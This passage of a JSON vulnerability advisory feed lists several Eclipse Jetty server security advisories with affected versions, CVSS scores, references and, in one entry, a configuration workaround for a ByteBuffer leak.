"https://lists.apache.org/thread.html/r8c22aad0711321537183ccddcade7274ebf9dcbdcdacc6c4f90f43de%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c22aad0711321537183ccddcade7274ebf9dcbdcdacc6c4f90f43de@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c839a0d88cd6504abbe72c260371094f47014b2ba08d8d2c0232e3c%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c839a0d88cd6504abbe72c260371094f47014b2ba08d8d2c0232e3c@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489dfc3e259ad3837141985dd9291b93e6b40496cdf58808915d67e9%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489dfc3e259ad3837141985dd9291b93e6b40496cdf58808915d67e9@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4981622ba15e8be1657d30b7c85044c7aabe89751fa7324f8604b834%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4981622ba15e8be1657d30b7c85044c7aabe89751fa7324f8604b834@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aff5ca6bc94a6f13ff77914fd960185ab70cd6cebe96fffd74543ac%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aff5ca6bc94a6f13ff77914fd960185ab70cd6cebe96fffd74543ac@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b2e7417a76e3dd4dc9855c6c138c49484080754a09927454f6d89f0%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b2e7417a76e3dd4dc9855c6c138c49484080754a09927454f6d89f0@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500e22d0aedba1866d0b5e76429b76652a473a0209fa8bf66c9f7aab%40%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500e22d0aedba1866d0b5e76429b76652a473a0209fa8bf66c9f7aab@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r51ec0120b6c849d12fb7fef34db87ef0bf79fcfcd3d703a9800afbba%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r51ec0120b6c849d12fb7fef34db87ef0bf79fcfcd3d703a9800afbba@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r543ea0a861a78d84c22656fb76880d7ab327048cf7ee3ccc7281375d%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r543ea0a861a78d84c22656fb76880d7ab327048cf7ee3ccc7281375d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5464405909eb0e1059d5dd57d10c435b9f19325fdebbadb4f1126997%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5464405909eb0e1059d5dd57d10c435b9f19325fdebbadb4f1126997@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c64173663c71f222ea40617ab362d7a590935fb75c18817fdec377e%40%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c64173663c71f222ea40617ab362d7a590935fb75c18817fdec377e@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e5cb33b545548ec4684d33bd88b05a0ae89c4d7cac93eb63255f58f%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e5cb33b545548ec4684d33bd88b05a0ae89c4d7cac93eb63255f58f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602683484f607cd1b9598caf3e549fbb01c43fd46a582a32cc3bb545%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602683484f607cd1b9598caf3e549fbb01c43fd46a582a32cc3bb545@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6493e43007f41e34cdbbb66622307fa235374dd2ec5bf52c61075a68%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6493e43007f41e34cdbbb66622307fa235374dd2ec5bf52c61075a68@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66456df852de06a0eed2c0a50252a2c8d360b8a5c005f63c0b1e3d25%40%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66456df852de06a0eed2c0a50252a2c8d360b8a5c005f63c0b1e3d25@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d5bb60a13e8b539600f86cb72097967b951de5c7ef1e4005cda74a7%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d5bb60a13e8b539600f86cb72097967b951de5c7ef1e4005cda74a7@%3Cnotifications.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-226" ], "github_reviewed": true, "github_reviewed_at": "2020-12-02T02:25:41Z", "nvd_published_at": "2020-11-28T01:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-872g-2h8h-362q", "published": "2018-10-19T16:16:16Z", "modified": "2024-02-16T08:22:06.138962Z", "aliases": [ "CVE-2016-4800" ], "summary": "Jetty contains an alias issue that could allow unauthenticated remote code execution due to specially crafted request", "details": "The path normalization mechanism in PathResource class in Eclipse Jetty 9.3.x before 9.3.9 on Windows allows remote attackers to bypass protected resource restrictions and other security constraints via a URL with certain escaped characters, related to backslashes.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.9" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.2.v20150730", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-872g-2h8h-362q/GHSA-872g-2h8h-362q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4800" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-872g-2h8h-362q" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190307-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00092.html" }, { "type": "WEB", "url": "http://www.ocert.org/advisories/ocert-2016-001.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/90945" }, { "type": "WEB", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-362" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:24:37Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8mpp-f3f7-xc28", "published": "2022-07-07T20:55:37Z", "modified": "2024-02-22T05:18:31.237834Z", "aliases": [ "CVE-2022-2191" ], "related": [ "CVE-2022-2191" ], "summary": "Jetty SslConnection does not release pooled ByteBuffers in case of errors", "details": "### Impact\n`SslConnection` does not release `ByteBuffer`s in case of error code paths.\nFor example, TLS handshakes that require client-auth with clients that send expired certificates will trigger a TLS handshake errors and the `ByteBuffer`s used to process the TLS handshake will be leaked.\n\n### Workarounds\nConfigure explicitly a `RetainableByteBufferPool` with `max[Heap|Direct]Memory` to limit the amount of memory that is leaked.\nEventually the pool will be full of \"active\" entries (the leaked ones) and will provide `ByteBuffer`s that will be GCed normally.\n\n_With embedded-jetty_\n\n``` java\nint maxBucketSize = 1000;\nlong maxHeapMemory = 128 * 1024L * 1024L; // 128 MB\nlong maxDirectMemory = 128 * 1024L * 1024L; // 128 MB\nRetainableByteBufferPool rbbp = new ArrayRetainableByteBufferPool(0, -1, -1, maxBucketSize, maxHeapMemory, maxDirectMemory);\n\nserver.addBean(rbbp); // make sure the ArrayRetainableByteBufferPool is added before the server is started\nserver.start();\n```\n\n_With jetty-home/jetty-base_\n\nCreate a `${jetty.base}/etc/retainable-byte-buffer-config.xml`\n\n``` xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE Configure PUBLIC \"-//Jetty//Configure//EN\" \"https://www.eclipse.org/jetty/configure_10_0.dtd\"\u003e\n\n\u003cConfigure id=\"Server\" class=\"org.eclipse.jetty.server.Server\"\u003e\n \u003cCall name=\"addBean\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.io.ArrayRetainableByteBufferPool\"\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.minCapacity\" default=\"0\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.factor\" default=\"-1\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxCapacity\" default=\"-1\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxBucketSize\" default=\"1000\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"long\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxHeapMemory\" default=\"128000000\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"long\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxDirectMemory\" default=\"128000000\"/\u003e\u003c/Arg\u003e\n \u003c/New\u003e\n \u003c/Arg\u003e\n \u003c/Call\u003e\n\u003c/Configure\u003e\n```\n\nAnd then reference it in `${jetty.base}/start.d/retainable-byte-buffer-config.ini`\n\n```\netc/retainable-byte-buffer-config.xml\n```\n\n\n### References\nhttps://github.com/eclipse/jetty.project/issues/8161\n\n### For more information\n* Email us at [security@webtide.com](mailto:security@webtide.com)\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.10" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-8mpp-f3f7-xc28/GHSA-8mpp-f3f7-xc28.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-8mpp-f3f7-xc28/GHSA-8mpp-f3f7-xc28.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-8mpp-f3f7-xc28" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2191" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/8161" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220909-0003" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T20:55:37Z", "nvd_published_at": "2022-07-07T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9rgv-h7x4-qw8g", "published": "2018-10-19T16:15:56Z", "modified": "2024-02-16T08:16:39.738843Z", "aliases": [ "CVE-2018-12536" ], "summary": "Eclipse Jetty Server generates error message containing sensitive information", "details": "In Eclipse Jetty Server, all 9.x versions, on webapps deployed using default Error Handling, when an intentionally bad query arrives that doesn't match a dynamic url-pattern, and is eventually handled by the DefaultServlet's static file serving, the bad characters can trigger a java.nio.file.InvalidPathException which includes the full path to the base resource directory that the DefaultServlet and/or webapp is using. If this InvalidPathException is then handled by the default Error Handler, the InvalidPathException message is included in the error response, revealing the full server path to the requesting system.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.10.v20180503", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9rgv-h7x4-qw8g/GHSA-9rgv-h7x4-qw8g.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.23.v20180228", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9rgv-h7x4-qw8g/GHSA-9rgv-h7x4-qw8g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12536" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535670" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://web.archive.org/web/20200516001904/http://www.securitytracker.com/id/1041194" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-209" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:29:36Z", "nvd_published_at": "2018-06-27T17:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g8m5-722r-8whq", "published": "2024-10-14T21:08:38Z", "modified": "2025-11-03T23:05:59.283307Z", "aliases": [ "CVE-2024-8184" ], "related": [ "CGA-3v96-9425-c5jg", "CGA-45xv-w77x-56w8", "CGA-4x6r-cwfp-wvmh", "CGA-56m4-5757-c9j7", "CGA-6wch-9rxv-fw5r", "CGA-8cjr-ccm5-q989", "CGA-8vvp-pq4p-2hc6", "CGA-c7jc-pc4g-5wpx", "CGA-c8xx-wqr2-vpgm", "CGA-f4m3-6jhg-xc6m", "CGA-h6g3-pgx4-5qf9", "CGA-hmc6-7f6h-r2jp", "CGA-m9gp-rqph-jfcv", "CGA-p858-c98g-7rp9", "CGA-rgmc-7h79-v9m6", "CGA-vp9g-g9wg-4xpq", "CGA-xj92-8mfm-x22p" ], "summary": "Eclipse Jetty's ThreadLimitHandler.getRemote() vulnerable to remote DoS attacks", "details": "### Impact\nRemote DOS attack can cause out of memory \n\n### Description\nThere exists a security vulnerability in Jetty's `ThreadLimitHandler.getRemote()` which\ncan be exploited by unauthorized users to cause remote denial-of-service (DoS) attack. By\nrepeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the\nserver's memory.\n\n### Affected Versions\n\n* Jetty 12.0.0-12.0.8 (Supported)\n* Jetty 11.0.0-11.0.23 (EOL)\n* Jetty 10.0.0-10.0.23 (EOL)\n* Jetty 9.3.12-9.4.55 (EOL)\n\n### Patched Versions\n\n* Jetty 12.0.9\n* Jetty 11.0.24\n* Jetty 10.0.24\n* Jetty 9.4.56\n\n### Workarounds\n\nDo not use `ThreadLimitHandler`. \nConsider use of `QoSHandler` instead to artificially limit resource utilization.\n\n### References\n\nJetty 12 - https://github.com/jetty/jetty.project/pull/11723", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.9" } ] } ], "versions": [ "12.0.0", "12.0.1", "12.0.2", "12.0.3", "12.0.4", "12.0.5", "12.0.6", "12.0.7", "12.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 12.0.8", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.24" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.17", "10.0.18", "10.0.19", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.23", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.24" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.17", "11.0.18", "11.0.19", "11.0.2", "11.0.20", "11.0.21", "11.0.22", "11.0.23", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.23", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.12" }, { "fixed": "9.4.56" } ] } ], "versions": [ "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.30.v20211001", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.53.v20231009", "9.4.54.v20240208", "9.4.55.v20240627", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.55", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-g8m5-722r-8whq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8184" }, { "type": "WEB", "url": "https://github.com/jetty/jetty.project/pull/11723" }, { "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/30" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00001.html" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2024-10-14T21:08:38Z", "nvd_published_at": "2024-10-14T16:15:04Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ghgj-3xqr-6jfm", "published": "2018-11-09T17:50:00Z", "modified": "2024-02-16T08:18:50.534710Z", "aliases": [ "CVE-2015-2080" ], "summary": "Jetty vulnerable to exposure of sensitive information to unauthenticated remote users", "details": "The exception handling code in Eclipse Jetty prior to 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.9.v20150224" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", 